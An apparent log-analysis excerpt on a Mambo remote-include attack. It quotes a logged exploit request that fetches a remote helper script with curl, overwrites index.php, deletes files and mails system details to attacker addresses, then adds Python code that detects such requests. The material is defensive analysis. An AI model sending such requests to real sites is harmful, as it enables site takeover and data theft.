Log File Analysis
According to www.honeynet.org/papers/webapp/:
GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://192.168.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http://192.168.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_192.168.181.27%20evil1@example.com;uname%20-a%20|%20mail%20-s%20uname_i2_192.168.181.27%20evil2@example.com;echo|
This has the effect of executing the script of the attackers' choosing, here http://192.168.57.112/~photo/cm. The exact operation of the exploit against the vulnerability can be seen in "Mambo Exploit" in Appendix A. In this case, the included file is a "helper" script, which attempts to execute the operating system command given by the cmd= parameter. Here the commands given would cause the helper script to be written over the index.php file, and the details of the operating system and...
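Detection logic for log entries of the kind quoted above, added here as an example and not taken from the Honeynet paper: it parses Apache-style access log lines (constructed samples using documentation IP addresses) and flags requests that point mosConfig_absolute_path at a remote URL or carry a cmd parameter, the two indicators the exploit depends on.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines in Apache common log format (not from the original page).
# The second line mimics the remote-include pattern discussed above, with a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2007:10:12:01 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [05/Jan/2007:10:12:07 +0000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&mosConfig_absolute_path=http://192.0.2.10/~photo/cm?&cmd=uname%20-a HTTP/1.1" 200 842
10.0.0.7 - - [05/Jan/2007:10:13:44 +0000] "GET /images/logo.png HTTP/1.1" 200 2048
"""

# Client IP, timestamp, method, request path and status code from a common/combined log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names the Mambo remote-include abuse relies on: an include path that is
# pointed at a remote URL, and a command parameter consumed by the fetched helper script.
INCLUDE_PARAMS = {"mosConfig_absolute_path"}
CMD_PARAMS = {"cmd"}
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def analyze_request(path):
    """Return a list of findings for one request path; parse_qs URL-decodes the values."""
    findings = []
    # keep_blank_values so parameters such as 'GLOBALS=' remain visible to the analyst
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if name in INCLUDE_PARAMS and REMOTE_URL_RE.match(value):
                findings.append(f"remote include via {name}={value}")
            if name in CMD_PARAMS:
                findings.append(f"command parameter {name}={value}")
    return findings


def scan_log(text):
    """Parse each log line and return (ip, timestamp, findings) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        findings = analyze_request(m.group("path"))
        if findings:
            hits.append((m.group("ip"), m.group("ts"), findings))
    return hits


if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip}")
        for finding in findings:
            print("   ", finding)
```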